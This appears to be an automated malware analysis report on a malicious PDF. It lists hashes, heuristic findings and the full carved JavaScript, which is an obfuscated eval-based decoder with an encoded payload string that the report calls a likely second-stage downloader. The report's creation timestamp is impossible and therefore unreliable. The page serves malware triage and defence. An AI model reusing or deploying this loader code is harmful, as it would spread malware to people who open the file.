Malicious PDF — malware analysis report

Static analysis result for SHA-256 9df7a6fdf0c3671a…

MALICIOUS

PDF

7.5 KB Created: 2008-31-20 53:85:00 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2013-06-07
MD5: 9310b564a16a0c3efc33a1744b864b4d SHA-1: 6f897c6ee17db9f74e985e66fd24707246f6ff10 SHA-256: 9df7a6fdf0c3671a29915831eb62a7951e056f7b6c1b844f04944357a74bbd3a
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript with multiple eval() calls, indicating an attempt to obfuscate malicious code execution. The script appears to be designed to download and execute a second-stage payload, as suggested by the heuristic firings for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The reconstructed string from the script is likely a URL or part of a command used in the attack.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function sDb27czri() {var datfield = 'jSjpMXxCfMrgSX1tgXchjrv'+'TY'+'XcVM0jp5q'+'cLU'+'BaTx'+'zQp1EQG7Xc'+'N5VjgxF33C08L'+'P'+'0'+'MW0HdWtFxf'+'7'+'XIakM8GPzvtMExfUXZBwE8GcX'+'x'+'LP0MW0H'+'dW'+'tzxGczQT1qRLMsCGWiSaFFve7EWXPYje0q001@MWjYc'+'hj@'+'R0'+'t0Mg_qI'+'AbXc'+'e0q0'+'01@MWj21'+'f'+'P0MW0HdWtzZXx0QX10je7K8Lm'+'saGWi'+'Sa'+'FFv'+'e'+'7E'+'W'+'X2'+'3dLUBaXcHjBMz8f'+'P0MW0'+'HdWtO1fbXaTxzQ'+'p1EQG'+'7XcaqHSNlE3Vw@xfUXaBv0mfkf8X1VmCRMla5'+'0'+'jHNXchjB1tmN8'+'HrX9pm'+'NQ'+'A'+'jSjpMXZ3O'+'pdV …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3D9 6032 bytes
SHA-256: 17bdced587a035261b8935ece6dbb338ee0d1a6b1c61bc7905e0aae2bc67a191
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s). 189 of 227 identifiers look randomly generated (e.g. 'jNKf3NckWgOk3NckWNlTrVckWHQI1gckWHKI9'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function sDb27czri() {var datfield = 'jSjpMXxCfMrgSX1tgXchjrv'+'TY'+'XcVM0jp5q'+'cLU'+'BaTx'+'zQp1EQG7Xc'+'N5VjgxF33C08L'+'P'+'0'+'MW0HdWtFxf'+'7'+'XIakM8GPzvtMExfUXZBwE8GcX'+'x'+'LP0MW0H'+'dW'+'tzxGczQT1qRLMsCGWiSaFFve7EWXPYje0q001@MWjYc'+'hj@'+'R0'+'t0Mg_qI'+'AbXc'+'e0q0'+'01@MWj21'+'f'+'P0MW0HdWtzZXx0QX10je7K8Lm'+'saGWi'+'Sa'+'FFv'+'e'+'7E'+'W'+'X2'+'3dLUBaXcHjBMz8f'+'P0MW0'+'HdWtO1fbXaTxzQ'+'p1EQG'+'7XcaqHSNlE3Vw@xfUXaBv0mfkf8X1VmCRMla5'+'0'+'jHNXchjB1tmN8'+'HrX9pm'+'NQ'+'A'+'jSjpMXZ3O'+'pdV'+'d'+'ivAaMMf'+'bBc'+'B7f'+'QXr'+'p8Xcq'+'afckmglg9Hckmglg'+'9Hc'+'kmglg9H'+'ckmHKf3VckuHl'+'kCVckWgONrAc'+'kmAm'+'3'+'rAc'+'kmAm'+'BdH'+'ckjNKV'+'9'+'HckjNMg9HckjNIIrV'+'ckjN'+'6BdgckWNKfS'+'V'+'ckW'+'NKI3NckmAIKCNckm'+'N'+'KHd'+'NckjNKf3'+'NckWg1k3'+'N'+'ckjNlT3N'+'ckjAKI1g'+'ckmgMS'+'SHckjAKI1gc'+'kWgZfSgckjNKX'+'9Hckj'+'NKf3Vc'+'kWg1k3NckWV5B9HckWg8U9gck'+'jN8TrHc'+'kmH'+'YB9'+'HckjNKpdHck'+'jNKf3NckjVQICgckW'+'V5k3'+'VckugYU9g'+'ck'+'Wg'+'xTdHckmHY'+'k'+'rHckj'+'NKpCNc'+'kjN'+'Kf3NckjVQICgc'+'kWV5kSgckuVQq9gckjHmk'+'CNckm'+'HY'+'31NckjN'+'KX1NckjNK'+'f3NckjVQI'+'Cg'+'ckWV5kSHc'+'km'+'HmU9gckmH'+'K0'+'d'+'Hckm'+'H'+'YUCNckjNKVCVckjNKf3'+'NckjVQICgckWV5S3N'+'ckW'+'HZq9gckmHQECgckmHYk9gc'+'k'+'jNK0d'+'AckjNKf3'+'Nc'+'kjV'+'QIC'+'g'+'ckjV'+'KI'+'3VckmNYSCNckjAQ09VckWgOTd'+'gckWNYTrV'+'ckjN6BCgckjNKfrNckWV'+'8k3N'+'ck'+'jA'+'QICgckWg1N3VckjNIprVck'+'jNZqdgckWg133'+'gckWNY3rVckmHY3rAckjN'+'K'+'I1gckjNKf3'+'NckmAY33NckWNxgrAckjAKVlHckug6B9gck'+'jNKf3NckWgOk3NckWNlTrVckWHQI1gckWHKI9'+'VckWgO33NckuVKprVckjHmU9'+'gckjNKf3'+'NckWVKf3NckjVQ'+'I1gckm'+'AxS3VckWVO'+'klNckWV'+'Q'+'I1gckmHYSS'+'gckjNKqdNckjNKf3N'+'ckjV'+'QfSVckW'+'H6N3Nck'+'WVlk'+'3Ncku'+'V8'+'@'+'dHckW'+'H6UdVckjNIp3Nc'+'kmAQ'+'E9gckjNKf3'+'NckjAQ'+'p1HckWg1N3NckjNl'+'TrV'+'ckjN'+'ZqdgckWg133gc'+'k'+'WNY3rVckjVKX9gckjNKf3Nck'+'mAxk3'+'NckWVYk'+'lAc'+'k'+'jVQfS'+'Vc'+'kmNSV3VckWVSV'+'1gckjHm3SVckuVKEdV'+'ckWVS03Nckj'+'V'+'QI1gckmAxSSHckWVOkrVckWVQI'+'1gckmHYSSg'+'ckjNKVSVckjNKf3NckjNKqdg'+'ck'+'jAQp1HckW'+'g1N3Nc'+'kjNY'+'TrVckjN9qdgckWg'+'133g'+'c'+'kWNY3rVckWNKX9gck'+'jN'+'Kf3Nc'+'kmAxk3NckWg1T1HckWNKpr'+'VckjNZ'+'qdgckWg133gckW'+'N'+'Y3rVckjNKX9gckjNKf3NckjV'+'Zf3NckWV90l'+'gckmH'+'ZfSVckmH'+'ZfSVck'+'mHZf'+'SVckmHZfSV'+'ckmHlS9V'+'ckWVxk3VckWg1'+'3SVc'+'km'+'H9V'+'dgc'+'kWV9p1AckmHKp1HckWg13rVckWg1B9HckjNY@CHckWVMS1gck'+'WV5kSH'+'ckj'+'A'+'SI1gckWg1gSHckWN8@CVckjNSE9gck'+'WV5T9'+'Vc'+'kjA5S1gckj'+'NSV3Nck'+'mNSp9Vck'+'jV'+'O3C'+'gc'+'kmgMTrNck'+'WHSfSVc'+'kmN'+'S0rAckj'+'NmTdAckWNKfdHckjH9Hrgc'+'kjNY@CVckWH83dNckjN'+'Sf3HckjV'+'Kp1Nck'+'jHZX'+'1g'+'ckjH8glgckjAQ0rHckWVxBdVckmH'+'1S1gckWVxS1gckjNS'+'V3VckmA'+'5NCHckjNlS'+'1gckWg1Tlg'+'ckWNl3rgckuHMkSVckjNI'+'I1gckjN'+'SI1gckWV'+'83dVc'+'kWH903HckjNKfSgc'+'k'+'jHI'+'X9gckjHmTdHckWVQp1H'+'ckj'+'Vl3lNc'+'kjVmT'+'3HckjNKprHcku'+'g1S1Ackug'+'mD'+'1gckWHKVdVckug'+'13CNckugx'+'SC'+'NckW'+'gx'+'DCHck'+'WH9I9gck'+'ugYS9HckWHZICNck'+'Wg6'+'S9HckW'+'gO3C'+'N'+'c'+'k'+'Wg8D1gckWgS0CN'+'ckWg8S'+'CNckWHZI1gc'+'kWg'+'6D1HckuHKK1'+'HckWg'+'1'+'SdAck'+'uH8N1NckuHxNdgckWHONCHckugmD9H'+'ckuH'+'9I9V'+'ck'+'mHmN1gz'+'@ZAjSjpMXxeRM8NFf'+'C'+'VzIde'+'lfMfbB'+'xH'+'6H1'+'HmB'+'1HmY'+'1'+'fO'+'pRXjTjTAqRG4KrN'+'DHCBcE1'+'fbBZ3OpdVdivAaM0y4fRGJHmejlxf'+'MY1'+'f'+'OpR'+'Xj'+'r80ki3e4E'+'RG50m'+'f'+'bBxe'+'RM8NFfCV'+'zIdelfMf'+'nBxL'+'8f8Cwz'+'8'+'GDfSN1SjT5YxH6V1A'+'PY1fOpRXj'+'@R0t0M'+'g_'+'q'+'Mf'+'bB'+'cB'+'7f'+'QXrp8X'+'c'+'qaf'+'ckjAm@1HckjAm@1Hz@ZAj@'+'R0t0Mg_'+'qMfbBcN5Vjgx'+'F3'+'3C'+'0'+'8LP0MW0HdWtFxf7XIak'+'M8GPz'+'v'+'tMEZ'+'AjSjpMXZVl2lem7v0'+'j21fwJrTmHuXA'+'p0CL'+'EW'+'X8D'+'Mfn'+'BxH6H'+'1Hm'+'B1Hm@'+'Z'+'yw'+'p0'+'e9M'+'vgI'+'0Rg'+'PVj3UBaT20m'+'fwSjpMXxW7qRaO'+'gWp1qzh'+'mY1W7qRaOgWp1qMh'+'SVd'+'awXjGRO1W7qRaO'+'gWp1qILs@xfUXxC'+'fM'+'rg'+'SX1tgOMW7qRaOgWp1qzRj21f'+'P'+'0MW0Hd'+'Wt'+'XZLjD'+'0B'+'8TlT2'+'Ed3'+'XO1fbXc_jSvB7V8'+'B'+'PiR'+'Gj2R3KEdp6'+'pd'+'g'+'zHmL'+'P'+'BZtjSjpMX'+'aNvK'+'zTMOvBxKvW1SIGj21'+'f'+'vXmX7SjecKjTMIzTMVj'+'e2z'+'Ry'+'1i'+'Q'+'010je7K8LP'+'Y'+'1fKpQ3c0uexfu'+'T'+'_'+'HC32XchjSr'+'pN'+'fRXsfjBJEMgVi'+'Ry'+'Mf8X'+'4pQp'+'c'+'qZyeHSyJFafz@Z'+'AjSj'+'pMXZNNKW'+'T6'+'MuV3f'+'S'+'C1N'+'la'+'j21f7fQ'+'BjT3XMpvtw'+'SrpNfRXsfjBJEMgViRyrqv'+'pMplBwBdL4'+'SrpNfRXsfjBJEMgViRyrqvpMplBwTdL4Sr'+'pN'+'fRXsfjB'+'JEM'+'gViR'+'yrqvpMplBw3dLPY'+'1f'+'P'+'I8fwUZNNKWT6'+'MuV3f'+'S'+'C1NlaB'+'XdR'+'j2dh'+'jU'+'1fiSxfwUZN'+'NKWT6MuV3fSC1N'+'l'+'aBpdRj2dh'+'jT1fiSx'+'fDKIB'+'iqWtS'+'VzN'+'gH9'+'VL'+'O0HGXxhj3dLj'+'sm'+'_jDS3'+'YI8tqV'+'S0ZOlgSF'+'SW82Mf'+'oBcHP@xfoFmfwD'+'S3YI'+'8t'+'qV'+'S0ZO'+'lgS'+'F'+'SWm2'+'M'+'f'+'b21f'+'YBaki'+'BZNNKWT6MuV3fSC1NlaBpdRjs'+'1f8'+'@xfoFmfwDS'+'3YI8'+'t'+'qVS0Z'+'OlgSFSWm2Mfo'+'BZgP@xfUXcaqHSNlE3Vw@ZAjSjp'+'MXxXK0WT8i'+'SCwXdN'+'rpm'+'fbBcB7fQX'+'rp8Xcqaf'+'ckm'+'HrX9pckmH'+'rX9pz@ZAjDmeP'+'FvTw'+'BWNMIvX'+'kOle'+'m'+'kSp8zxGczQT'+'1q8'+'foBxg1@dgM@x'+'fmI3X'+'ipuag'+'q8HZVvXj'+'Y'+'chj'+'BW'+'NMI'+'vXkOlemkS'+'p8O'+'1f1'+'qvelzZp2F8Gv0Q'+'01iRXcXch'+'jNSG'+'4F'+'vpzzZp2F8GcV8BZ'+'7v'+'pPFvC7IQGwYuXx0ReqBa'+'fzscGl'+'KR'+'AjBWNMIv'+'XkOle'+'m'+'kS'+'p87jLUBc_j2mfnI'+'0N5T'+'8t8'+'kCp1'+'qcLU2'; function kclE9it7(GYvQc){ var tp = '63@25@2@62@1@20@21@3@28@41@0@0@0@0@0@0@18@37@54@57@42@19@7@48@39@47@10@43@33@31@58@27@4@44@60@46@50@22@59@61@55@26@40@0@0@0@0@52@0@56@16@8@9@49@35@38@36@11@13@34@30@29@0@17@51@23@14@6@53@45@12@5@24@32@15'; var QGRaRFlaIxVfka=0, Jkv2cbr1vZA0=GYvQc.length, gxrMZ=1024, ziLUo3aNy1, gmj2oM, MNXFXhRYeIv='', uWxG1mJaAHb0NO=QGRaRFlaIxVfka, OCF3scZ9A=QGRaRFlaIxVfka, KjwreAnB94=QGRaRFlaIxVfka, tMm6eOE3m9RyOT=Array(); tMm6eOE3m9RyOT = tp.split('@'); for(eval('gmj2oM=Ma'+'th.'+'ce'+'il(Jkv2cbr1vZA0'+'/gxrMZ)');gmj2oM>QGRaRFlaIxVfka;gmj2oM--){ for(eval('ziLUo3aNy1=M'+'ath'+'.m'+'in(Jkv2cbr1vZA0,'+'gxrMZ)');ziLUo3aNy1>QGRaRFlaIxVfka;ziLUo3aNy1--,Jkv2cbr1vZA0--){ eval('KjwreAnB94|'+'=(tMm6eOE3m9RyOT['+'GYvQc.'+'cha'+'rCo'+'de'+'At(uWxG1mJaAHb0NO+'+'+)-48])<'+'<OCF3scZ9A'); if(OCF3scZ9A){ eval('MNXFXhRYeIv+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](173^'+'KjwreAnB94&'+'25'+'5)'); KjwreAnB94>>=8; OCF3scZ9A-=2; } else { OCF3scZ9A=6; } } } eval(MNXFXhRYeIv); } kclE9it7(datfield);}

Open this report in the interactive analyzer, or submit your own file for analysis.